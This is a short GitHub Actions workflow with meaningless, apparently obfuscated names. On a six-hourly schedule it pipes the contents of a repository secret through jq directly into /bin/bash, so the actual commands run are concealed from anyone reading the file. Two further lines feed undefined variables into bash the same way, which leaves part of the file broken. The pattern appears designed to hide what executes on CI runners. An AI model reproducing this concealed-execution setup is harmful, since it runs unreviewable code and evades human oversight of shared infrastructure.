name: bowallow

on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bowallow
        env:
          iixg6: ${{ secrets.iixg6 }}
        run: |
          echo $iixg6 | jq -r .gd6140 | /bin/bash
          echo $ovoka4 | jq -r .psn2236 | /bin/bash
          echo $ngb5986 | jq -r .hybn6 | /bin/bash

